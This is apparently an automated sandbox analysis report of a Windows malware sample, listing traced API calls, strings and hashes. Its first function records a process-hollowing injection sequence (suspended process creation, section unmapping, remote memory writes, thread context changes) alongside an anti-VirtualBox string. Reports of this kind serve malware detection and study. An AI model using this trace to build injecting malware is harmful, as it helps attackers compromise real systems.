                                                                        • LoadLibraryA.KERNEL32(00000073,StcF), ref: 00407666
                                                                        • LoadLibraryA.KERNEL32(advapi,00000052), ref: 0040767C
                                                                        • LoadLibraryA.KERNEL32(advapi,00000052), ref: 0040768F
                                                                        • LoadLibraryA.KERNEL32(advapi,RuV), ref: 0040769F
                                                                        • LoadLibraryA.KERNEL32(advapi,RuV), ref: 004076B5
                                                                        • LoadLibraryA.KERNEL32(advapi,00000052), ref: 004076C5
                                                                        • LoadLibraryA.KERNEL32(advapi,00000052), ref: 004076D5
                                                                        • LoadLibraryA.KERNEL32(advapi,00000052), ref: 004076E5
                                                                        • LoadLibraryA.KERNEL32(0000006B,?), ref: 004077AC
                                                                        • LoadLibraryA.KERNEL32(0000006B,?), ref: 004077BC
                                                                        • LoadLibraryA.KERNEL32(advapi,0000004F), ref: 004077CC
                                                                        • LoadLibraryA.KERNEL32(advapi,?), ref: 004077E2
                                                                        • LoadLibraryA.KERNEL32(advapi,Allocat), ref: 004077F8
                                                                        • LoadLibraryA.KERNEL32(advapi,EqualSid), ref: 0040780E
                                                                        • LoadLibraryA.KERNEL32(advapi,LookupAccountSidA), ref: 00407824
                                                                        • LoadLibraryA.KERNEL32(0000006B,Clos), ref: 0040783A
                                                                        • LoadLibraryA.KERNEL32(0000006B,?), ref: 0040784A
                                                                        • LoadLibraryA.KERNEL32(0000006B,?), ref: 00407860
                                                                        • LoadLibraryA.KERNEL32(0000006B,Clos), ref: 00407876
                                                                        • LoadLibraryA.KERNELBASE(psapi.dll,?), ref: 00407A43
                                                                        • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 00407AFB
                                                                        • wcscpy.MSVCRT ref: 00407B17
                                                                        • wcscpy.MSVCRT ref: 00407F50
                                                                        • wcscat.MSVCRT ref: 00407F7A
                                                                        • wcscpy.MSVCRT ref: 00407F8A
                                                                        • wcscat.MSVCRT ref: 00407F9E
                                                                        • wcscat.MSVCRT ref: 00408144
                                                                        • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0040817F
                                                                        • Wow64GetThreadContext.KERNEL32 ref: 004081A2
                                                                        • NtReadVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 004081BE
                                                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 004081CF
                                                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 004081E0
                                                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 004081FF
                                                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 0040820D
                                                                        • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 00408288
                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 004082BF
                                                                        • VirtualAllocEx.KERNELBASE(?,-FFF00000,00100000,00003000,00000040,?,00003000,00000040), ref: 004082EE
                                                                        • WriteProcessMemory.KERNEL32(?,00000000,.dll,00000190,00000000,?,00003000,00000040), ref: 00408306
                                                                        • WriteProcessMemory.KERNELBASE(?,00000000,.dll,?,00000000,?,00003000,00000040), ref: 00408317
                                                                        • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?,00003000,00000040), ref: 00408353
                                                                        • WriteProcessMemory.KERNELBASE(?,0000002E,0000006B,?,00000000,?,00003000,00000040), ref: 004083C0
                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,00000004,?,?,00003000,00000040), ref: 004083F5
                                                                        • Wow64SetThreadContext.KERNEL32(?,00010007,?,00003000,00000040), ref: 0040841A
                                                                        • WriteProcessMemory.KERNELBASE(?,00000050,?,00000004,00000000,?,00003000,00000040), ref: 00408480
                                                                        • ResumeThread.KERNELBASE(?,?,00003000,00000040), ref: 00408486
                                                                        • Wow64SuspendThread.KERNEL32(?,?,00003000,00000040), ref: 00408490
                                                                        • WriteProcessMemory.KERNELBASE(?,00000050,?,00000004,00000000,?,00003000,00000040), ref: 004084B5
                                                                        • wcscpy.MSVCRT ref: 00408760
                                                                        • wcscat.MSVCRT ref: 00408774
                                                                        • MoveFileExW.KERNELBASE(?,?,00000008), ref: 0040878D
                                                                        • CopyFileW.KERNELBASE(?,?,00000000), ref: 004087A3
                                                                        • ResumeThread.KERNELBASE(?), ref: 004087FC
                                                                        • Sleep.KERNELBASE(00000002), ref: 00408815
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 00408837
                                                                        • Module32First.KERNEL32(00000000,00000000), ref: 004088AC
                                                                        • strstr.MSVCRT ref: 004088D6
                                                                        • Wow64SuspendThread.KERNEL32(?), ref: 00408904
                                                                        • Wow64SuspendThread.KERNEL32(?), ref: 0040891F
                                                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00408926
                                                                        • DeleteFileW.KERNELBASE(?), ref: 00408930
                                                                        • ResumeThread.KERNELBASE(?), ref: 00408949
                                                                        • Sleep.KERNELBASE(00000002), ref: 0040894D
                                                                        • DeleteFileW.KERNELBASE(?), ref: 00408956
                                                                        • Wow64SuspendThread.KERNEL32(?), ref: 0040897B
                                                                        • Sleep.KERNELBASE(00000005), ref: 0040898A
                                                                        • MoveFileExW.KERNELBASE(?,?,00000008), ref: 0040899C
                                                                        • ResumeThread.KERNELBASE(?,?,00003000,00000040), ref: 004089B3
                                                                        • wcscat.MSVCRT ref: 00408A5B
                                                                        • wcsstr.MSVCRT ref: 00408A82
                                                                        • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00408AA2
                                                                        • TerminateProcess.KERNELBASE(00000000), ref: 00408AD9
                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000002,00000000,00000000), ref: 00408C6D
                                                                        • CreateFileW.KERNELBASE(00000000,40000000,00000002,00000000,00000003,00000000,00000000), ref: 00408C8E
                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00408CAF
                                                                        • CreateFileW.KERNELBASE(00000000,40000000,00000002,00000000,00000005,00000000,00000000), ref: 00408CD2
                                                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00408CE1
                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00408D72
                                                                        • Process32First.KERNEL32(00000000,00000128), ref: 00408DDC
                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 00408DF1
                                                                        • strstr.MSVCRT ref: 00408E02
                                                                        • strstr.MSVCRT ref: 00408E16
                                                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00408E2E
                                                                        • CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00408FB8
                                                                        • CreateFileA.KERNELBASE(00000000,00000000,00000002,00000000,00000003,00000000,00000000), ref: 00408FDA
                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00409030
                                                                        • wcslen.MSVCRT ref: 00409045
                                                                        • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040906E
                                                                        • wcscat.MSVCRT ref: 004090E9
                                                                        • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00409108
                                                                        • VirtualAlloc.KERNELBASE(00000000,-00000400,00003000,00000040), ref: 0040912D
                                                                        • ReadFile.KERNELBASE(?,.dll,00000000), ref: 00409151
                                                                        • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 004091BD
                                                                        • VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000040), ref: 00409294
                                                                        • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 004099EB
                                                                        • Sleep.KERNELBASE(00000320), ref: 004099F6
                                                                        • TerminateProcess.KERNELBASE(?,00000000), ref: 004099FF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1683756741.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.1683727585.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683756741.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683756741.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683843776.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683864454.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad$File$Create$Process$Thread$Memory$Write$VirtualWow64wcscat$Alloc$ChangeCloseFindNotificationResumeSectionSleepSuspendUnmapViewwcscpy$strstr$AddressContextDeleteFirstMoveProcProcess32ReadSnapshotTerminateToolhelp32$CopyModuleModule32NameNextwcslenwcsstr
                                                                        • String ID: $ $ $ $ $ $ $ /c $"$"$"$"$"$"$"$"$",1$'$($)$.$.$.$.$.$.$.$.$.$.$.$.$.dll$/$/$/$0$0$0$2$2$2$2$2$2$2$2$2$2$4$5$5$7$7$<$<$<$<$<$=$>$>$>$>$>$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$Allocat$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$Clos$CopyFil$D$D$D$D$D$Dtl$Duplicat$E$E$E$E$E$E$E$E$E$EqualSid$ExitProc$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$I$I$I$I$IsWow64Proc$L$L$LookupAccountSidA$M$M$M$M$M$M$M$M$M$M$Modul$Modul$Mov$N$N$N$N$N$NtR$NtUnmapVi$O$O$O$O$O$O$O$P$P$P$P$P$P$P$P$P$P$P$P$Proc$Proc$Program Fil$Q$Q$R$R$R$R$R$R$R$Rmr$RuV$RuV$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$Shdt$Sii$Sitbs$StcF$StcF$Susp$Sys$T$T$T$T$T$T$T$T$T$T$T$V$V$V$V$V$VBoxS$VirtualAlloc$VirtualAllocEx$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$Writ$Writ$\$\$\$\$\$\SD_$\cmd.$_$_$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$advapi$b$b$b$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$e$f$f$f$f$f$f$g$g$g$g$g$g$g$h$h$h$h$h$h$h$h$h$h$h$h$h$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$j$k$k$k$k$k$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$myapp.$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$ntdll.dll$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$psapi.dll$q$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$v$v$v$v$w$w$w$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$y$y$y$y$y$y$y$y$y$y$y$y$y$z$z$z
                                                                        • API String ID: 1831195861-1627083277
                                                                        • Opcode ID: 5d7796b2e5e3ecb3d87d144c009cb48b078826e94f245f0edb57868d79b5afd3
                                                                        • Instruction ID: 2c80d00dd46d1456f42e515657256ab332893eb39df263fc7d206d4ca39ac36b
                                                                        • Opcode Fuzzy Hash: 5d7796b2e5e3ecb3d87d144c009cb48b078826e94f245f0edb57868d79b5afd3
                                                                        • Instruction Fuzzy Hash: 0993FE60D086E8D9EB22C768CC587DEBFB55F66304F0441D9D18C77282C6BA5B88CF66
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • SendMessageA.USER32(?,00000080,00000001,?), ref: 0040A2C8
                                                                        • SendMessageA.USER32(?,00000080,00000000,?), ref: 0040A2D9
                                                                        • GetWindowRect.USER32(?,?), ref: 0040A2F1
                                                                          • Part of subcall function 004052C0: CopyRect.USER32(?,004384C8), ref: 004052CD
                                                                        • _ftol.MSVCRT ref: 0040A30F
                                                                        • GetWindowRect.USER32(?,?), ref: 0040A34B
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 00405316
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040533E
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040535E
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040537E
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040539E
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 004053BE
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 004053DE
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 004053FE
                                                                          • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040541E
                                                                        • SetWindowRgn.USER32(?,0040C340,00000001), ref: 0040A37F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1683756741.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.1683727585.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683756741.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683756741.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683843776.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683864454.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$Copy$Window$MessageSend$_ftol
                                                                        • String ID:
                                                                        • API String ID: 1452107452-0
                                                                        • Opcode ID: 77d943f6ea96e2ee8d93cdf0a1eb352025076fd503600f4a23e69f77a4334500
                                                                        • Instruction ID: 82604ac88615afb37d6d3c3cd9f472b3106c4a6f90d73964fe7bd466d50d877b
                                                                        • Opcode Fuzzy Hash: 77d943f6ea96e2ee8d93cdf0a1eb352025076fd503600f4a23e69f77a4334500
                                                                        • Instruction Fuzzy Hash: 85315E71204705AFD314DF25C885F6BB7E8FBC8B04F004A2DB585A32C1D678E8098B9A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 409 40b2a2-40b2b7 69CE4ED0
                                                                        APIs
                                                                        • 69CE4ED0.MFC42(0040B243,0040B243,0040B243,0040B243,0040B243,00000000,?,0000000A), ref: 0040B2B2
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1683756741.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.1683727585.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683756741.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683756741.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683843776.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683864454.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                                                                        • Instruction ID: 357b4c9800bdd651ee11a6a5109b4e9d846802b8a319b0e0d2e175bba6204330
                                                                        • Opcode Fuzzy Hash: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                                                                        • Instruction Fuzzy Hash: 17B00836018386ABCB02DE91890592EBAA2BB99304F484C6DB2A5100A187668429BB56
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • IsIconic.USER32(?), ref: 0040A464
                                                                        • SendMessageA.USER32(?,00000027,?,00000000), ref: 0040A49D
                                                                        • GetSystemMetrics.USER32(0000000B), ref: 0040A4AB
                                                                        • GetSystemMetrics.USER32(0000000C), ref: 0040A4B1
                                                                        • GetClientRect.USER32(?,?), ref: 0040A4BE
                                                                        • DrawIcon.USER32(?,?,?,?), ref: 0040A4F6
                                                                        • CreateCompatibleDC.GDI32(?), ref: 0040A5A2
                                                                        • LPtoDP.GDI32(?,?,00000002), ref: 0040A5BE
                                                                        • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0040A5DF
                                                                        • GetMapMode.GDI32(?,0040C6D4,00000000), ref: 0040A606
                                                                        • DPtoLP.GDI32(?,?,00000002), ref: 0040A622
                                                                        • GetWindowRect.USER32(?,?), ref: 0040A66B
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1683756741.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.1683727585.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683756741.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683756741.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683843776.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683864454.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CompatibleCreateMetricsRectSystem$BitmapClientDrawIconIconicMessageModeSendWindow
                                                                        • String ID:
                                                                        • API String ID: 291364621-0
                                                                        • Opcode ID: cc57a5fc9d29755f929ad528291421c18db79410564ff0f4d1ad48c5de029751
                                                                        • Instruction ID: 6d70c99ac97023b5f14d40c01a2117d862bf0d83ff31a6fcaea798b65c65e005
                                                                        • Opcode Fuzzy Hash: cc57a5fc9d29755f929ad528291421c18db79410564ff0f4d1ad48c5de029751
                                                                        • Instruction Fuzzy Hash: 5FA1F971108341DFC314DF69C985E6BB7E9EBC8704F008A2EF596A3290D774E909CBA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404A56
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404A7E
                                                                          • Part of subcall function 004039C0: _ftol.MSVCRT ref: 00403B21
                                                                          • Part of subcall function 004039C0: _ftol.MSVCRT ref: 00403B4C
                                                                          • Part of subcall function 004039C0: Polygon.GDI32(?,?,?), ref: 00403B9A
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404A9E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404ABE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404ADE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404AFE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404B1E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404B3E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404B5E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404B7E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404B9E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404BBE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404BDE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404BFE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404C1E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404C3E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404C5E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404C7E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404C9E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404CBE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404CDE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404CFE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D1E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D3E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D5E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D7E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D9E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404DBE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404DDE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404DFE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E1E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E3E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E5E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E7E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E9E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1683756741.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.1683727585.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683756741.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683756741.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683843776.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683864454.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CopyRect$_ftol$Polygon
                                                                        • String ID: BottoFlowerPetal2$BottomFlowerPetal1$BottomFlowerPetal3$LeftFlowerPetal1$LeftFlowerPetal2$LeftFlowerPetal3$Polygon0$Polygon1$Polygon10$Polygon11$Polygon14$Polygon15$Polygon16$Polygon17$Polygon18$Polygon19$Polygon2$Polygon23$Polygon24$Polygon28$Polygon29$Polygon3$Polygon30$Polygon31$Polygon32$Polygon33$Polygon34$Polygon5$Polygon6$RightFlowerPetal1$RightFlowerPetal2$RightFlowerPetal3$TopFlowerPetal$TopFlowerPetal1$TopFlowerPetal2
                                                                        • API String ID: 2518728319-821843137
                                                                        • Opcode ID: 87e4436c3c6629d57b8aebde8347d3bf4d65c1ba0eaf32c96809e53bf2946d36
                                                                        • Instruction ID: 1b864ce688a3351c981eaee8f36bd257d0a296356b300086fb8b46b6cfa255b8
                                                                        • Opcode Fuzzy Hash: 87e4436c3c6629d57b8aebde8347d3bf4d65c1ba0eaf32c96809e53bf2946d36
                                                                        • Instruction Fuzzy Hash: FAB1B1FA9A03007ED200F6619C82D6BBB6CDAF8B15F40DD0EB559610C3B9BCD304867A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • CopyRect.USER32(?,004384C8), ref: 00405316
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040533E
                                                                          • Part of subcall function 00403E10: _ftol.MSVCRT ref: 00403F95
                                                                          • Part of subcall function 00403E10: _ftol.MSVCRT ref: 00403FBF
                                                                          • Part of subcall function 00403E10: CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 00403FDF
                                                                          • Part of subcall function 00403E10: CombineRgn.GDI32(?,?,00000000,00000005), ref: 00404004
                                                                          • Part of subcall function 00403E10: CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040400E
                                                                          • Part of subcall function 00403E10: CombineRgn.GDI32(?,?,?,00000002), ref: 00404042
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040535E
                                                                          • Part of subcall function 00403E10: CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040404A
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040537E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040539E
                                                                        • CopyRect.USER32(?,004384C8), ref: 004053BE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004053DE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004053FE
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040541E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040543E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040545E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040547E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040549E
                                                                        • CopyRect.USER32(?,004384C8), ref: 004054BE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004054DE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004054FE
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040551E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040553E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040555E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040557E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040559E
                                                                        • CopyRect.USER32(?,004384C8), ref: 004055BE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004055DE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004055FE
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040561E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040563E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040565E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040567E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040569E
                                                                        • CopyRect.USER32(?,004384C8), ref: 004056BE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004056DE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004056FE
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040571E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040573E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040575E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1683756741.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.1683727585.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683756741.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683756741.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683843776.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.1683864454.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CopyRect$CreatePolygon$Combine_ftol
                                                                        • String ID: BottoFlowerPetal2$BottomFlowerPetal1$BottomFlowerPetal3$LeftFlowerPetal1$LeftFlowerPetal2$LeftFlowerPetal3$Polygon0$Polygon1$Polygon10$Polygon11$Polygon14$Polygon15$Polygon16$Polygon17$Polygon18$Polygon19$Polygon2$Polygon23$Polygon24$Polygon28$Polygon29$Polygon3$Polygon30$Polygon31$Polygon32$Polygon33$Polygon34$Polygon5$Polygon6$RightFlowerPetal1$RightFlowerPetal2$RightFlowerPetal3$TopFlowerPetal$TopFlowerPetal1$TopFlowerPetal2
                                                                        • API String ID: 3890769595-821843137
                                                                        • Opcode ID: 85cede26e4b860c6ad17a1a95b28b9ea8d05a42ed7a07d3d258b3a2797b32652
